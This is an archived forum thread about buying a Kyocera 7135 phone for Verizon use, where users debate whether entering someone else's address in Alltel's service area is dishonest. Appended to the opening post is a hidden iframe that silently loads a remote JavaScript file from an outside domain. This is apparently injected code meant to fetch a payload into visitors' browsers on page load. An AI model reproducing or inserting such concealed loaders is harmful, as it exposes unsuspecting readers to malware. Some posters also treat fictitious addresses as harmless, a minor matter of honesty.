Closed Thread
Page 1 of 3 1 2 3 LastLast

Possible to purchase without being dishonest?

Does anyone know where I could buy a 7135 without having to give a false billing address? I am not trying to pass judgement on the way(s) people get the phone, rather I would just like to get one without having to give false information. I am aware that the best way would be to wait for Verizon to offer them, but I have my doubts about when they are going to release it. Thank you.

- Derek<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Walk into an Alltel store and buy it sans contract.

It's not a false billing address. It's a false "service" address.

I don't consider it to be dishonest. Heck, it was the girl at getconnected that told me how to so it.

Mike

Two methods - either move to an Alltel service area (or a better option, move to a Telstra service area - but I am biased on that one ), or ebay.

Eitherway, it'll cost you a premium.

I understand your dilemma and shared your concern. Honesty is a big deal for me. I will not lie about anything just to get a phone. That is one of the reasons I waited to hear that people are activating the phone without lying to Verizon.

When I ordered, I searched for friends and relatives who lived in an Alltel area who wouldn't mind me putting their address for the phone. I couldn't find one so I put one of my company's branch locations where I've worked a few years ago. My company does reimburse $50/month for my service, I'm getting a corporate discount with Verizon, and I must register my personal phone in their database for the reimbursement. So I didn't see it as lying using one of my company's addresses.

Just before the final web-submission, I did another search and found my Auntie's address was in the service area. I preferred to use my family member because I don't want to involve my company in this, We have a close family and theoretically, I can move to Virginia and live with my Auntie. I tried to change the address and somehow the order took off! I called Getconnected to the address changed to my Auntie's and told them exactly what I was doing -- supplying an address of a family member but actually activating it at Verizon. The rep laughed at me and said that he didn't care and wouldn't track me down. He did update the address per my request although it didn't matter.

This is how I was able to feel very comfortable with the transaction.

Derek--

paypal me the money and I'll go buy you one at Alltel. $649 + 6% for tax + shipping.

seriously, PM me if you are interested

I'm sorta having the same problem... I don't have a problem with getting the phone with a "false" zip code... The part where I'm having a problem, is when I tell Verizon Customer Service what I'm trying to do, they seem to freeze up when they realize that they do not currently service this phone. They keep encouraging me to go to the store, which would ensure that I purchase something that they can currently support. Basically, I'm having trouble getting $100 off the cost of the phone + first month free (like jazmaan did - 'cause I have only budgeted about $500 to spend on this phone) and assuring that they will activate it.

So, basically, I've tried to be honest when I call Customer Service and tell them what I want/need... and they keep saying they can't do that for me.

I guess I'm willing to lie to a computer/e-commerce website to get the phone, but I have a hard time when faced with a real person at Customer Service. It feels like I'm encouraging them to do something unethical by asking them to not only activate a phone I bought from someone else, but also to give me discounts for doing it. I just can't do it.

So, I'm waiting 'til I can actually buy the phone from Verizon and get a discount from them (more ethically), and not feel like I'm pulling off a scam in the process.

Maritza

Fut
    I would agree, as well, that I wouldn't be up the challenge, if I had to be dishonest in any way. However, maybe I'm unclear on what is being dishonest when the service provider has the option themselves to activate the phone. I myself will be waiting for Sprint to hopefully come out with it, but if they offered the same service, I do not see anything unethical about purchasing a product and servicing it. I'm sure I'm probably missing out on something, but am I not getting the whole picture here?

Nathan

Fut
    I'm also faced with the peculiar warranty upgrade I purchased from Best Buy when I bought my i300 last February. First of, the rep informed me I could flash the phone to upgrade to the 3G network (as I believe others were told as well). However, now I'm having doubts on what the BB rep told me about the warranty. He claimed it to be a "Technology Upgrade," where it's completely part of the contract to upgrade when something new comes out, by just paying the difference. Well, I hope he's correct, because the BB's by my house (So.Cal- Orange Co.) still carry the i300's on display.
    Anybody know further into this?

Nathan

Originally posted by MaritzaSL
    Basically, I'm having trouble getting $100 off the cost of the phone + first month free (like jazmaan did - 'cause I have only budgeted about $500 to spend on this phone) and assuring that they will activate it.
    Good point, Maritza. Getting the discount is requisite for your purchase. That is different.

I think I'd have a problem calling Verizon and asking for a discount on a phone they didn't sell me if I had to lie. Jazzman did NOT lie, AFAIK. The rep knew that Verizon was not selling the phone. The discount was given honestly. Jazzman already had the phone and the worse he could hear was "No" and I'm thinking that he might have lived with that response.

The "unethical" part is giving Alltell an address as your own, when it is not. It is lying. Of course, I have no idea why Alltel is requiring that address since they seem to know that people are giving them fake addresses. Nevertheless, if you want to look at it from an ethics standpoint, it is wrong. Whether this "small lie" without seeming consequence to the company being lied to is important enough to stop you from doing it is a personal choice.

Ah, free will.

I must say that having spent a long time in ethics related fields, I am impressed that some people are bothered by this.

I ordered my phone on New Year's Eve (after having stumbled across this AMAZING board with you AMAZING people), and don't think there is anything ethically troubling about putting in Phoenix, Arizona's City Hall as my "service address," my real credit card billing address and my real ship-to address.

The lovely folks at the Phoenix City Hall were providing an invaluable "service" to me by enabling me to buy the phone -- which should arrive tomorrow! -- and I will honestly and openly ask Verizon to activate it for me. If Verizon won't knowingly choose to activate my 7135, I'll put it back in the box and return it.

I think of the "service address" as more of a programming error on the part of getconnected's website than an oath that I really live in Arizona. The friendly folks at getconnected.com know full well that I don't live in Arizona City Hall, when I'm having the phone and my credit card bills sent to New York City -- and they don't care!

They asked for a "service address." Well, guess what -- I'm not ordering any "service" from them. I'm ordering a hunk of plastic and metal -- and I'm paying a big premium to do so WITHOUT ANY SERVICE. So the "service address" is purely theoretical. If 1600 Pennsylvania Avenue (the White House) was in their service area, I would have used that. If Cinderella's Castle at Disneyland were in their service area, I might have used that.

It's not dishonest or unethical to put in a fictitious address for a theoretical service you are not buying and they are not anticipating selling to you. Both parties know exactly what they're doing and are choosing to procced, with full knowledge.

That's my feeling, anyway. Oh, and I won't be doing much sleeping tonight -- I feel like a kid on Xmas eve!! (-:

When I ordered my 7135 via telephone from GetConnected, the rep said that the phone could only be ordered if I gave them a ZIP code in the Alltel service area. I did, and when I gave them a much different shipping address, they asked me if I was going to activate the phone with Verizon. I said yes, and they said it's fine, just don't expect Verizon to be too happy about it. I accepted that, and gladly gave them my credit card number.

The rep didn't ask for *my* ZIP code, but for *a* zipcode in the Alltel service area... they're not enforcing shipping/billing addy only to Alltel zip codes because they don't care... it's probably a contractual thing between Kyo and the cell providers, that GetConnected verify Alltel ZIP codes.

When I call to activate the 7135 with Verizon, I'm just going to give them my new ESN, and if they start asking questions, I'll be honest. If they won't do it, I'll keep calling hoping to get a different customer service agent that will accomodate me. Others have done the 'call in the new ESN, activate the PRL via the over-the-air update' with success, so I'm not too worried.

No lies, no deception... I sleep well at night Honesty *is* the best policy, after all.

http://mikewren.com

Originally posted by lilmike

. . . .It's not dishonest or unethical to put in a fictitious address for a theoretical service you are not buying and they are not anticipating selling to you. Both parties know exactly what they're doing and are choosing to procced, with full knowledge.

That's my feeling, anyway. Oh, and I won't be doing much sleeping tonight -- I feel like a kid on Xmas eve!! (-:
    I had some initial qualms about being "less than honest" but you're right, I'm not buying their service -- just the hardware.

This is merely the "etailers" version of "tell'm Charlie sent ya" type of advice and perceived consideration. It also proved to be a lot of fun, finding a way around a delayed release by a preferred provider. Near as I can tell, there's no harm to anyone other than some lost sales to those late to go to market. Hey, that's the American way!!!:p :p :p

lilmike: how are you receiving your phone tomorrow? GetConnected didn't offer Saturday delivery for me (I also ordered on 12/31, am update, and am planning on Monday delivery, even though the phone should be getting into town over teh weekend). Any secrets you know about?

http://mikewren.com

Just tell Verizon the truth

Not only did I not have any problem activating my 7135 with Verizon, I've spent a bunch of time on the phone with their upper level support group trying to resolve a couple if issues.

I told them I was activating a 7135 and they know they are supporting a 7135.

I think their support people are looking at it as a form of pre-training. They have said that they have a few lying around for them to work with.

Andy

I live in Queens, NY and called yesterday to order the phone w/out service. They only required an address in an Alltel area just to say that it was sold there. The billing and ship to address can be different and they didn't seem to care at all.

However, I called to cancel the order today after thinking that there may be bugs and some compatability issues and I didn't want to risk paying $649.00. I'm concerned that Verizon won't be able to support it or even replace it under my current insurance plan.

It's kiiling me that I now have to wait

Administrator
    no one cares where you get the phone (except sprint). alltell is not losing money or upset that folks are buying the phone for verizon. the fact that you need to use an alternate adress is only if you are not in the service area. but you can go to the kyo geek link and order one with no contract as stated above. its not being dishonest. if altell were worried about it, they would not let anyone order the phone and have it shipped to a different address...

I agree with marctronixx. You are only buying the hardware and paying a premium as a result. In my case i actually activated it on Alltel and then cancelled after they couldn't resolve my data issues.

Alenzini had it right in that even though vzw hasn't released the phone they are benefiting from the troubleshooting they are doing for us "non standard" adopters.

Alltel could really use this as an opportunity to lure away subscribers but they don't seem to understand what they have.

I think it is very unlikely that kyocera is making hardware changes to the phone in order for it to work on vzw network so I see purchasing now from Alltel as no risk.

Closed Thread
Page 1 of 3 1 2 3 LastLast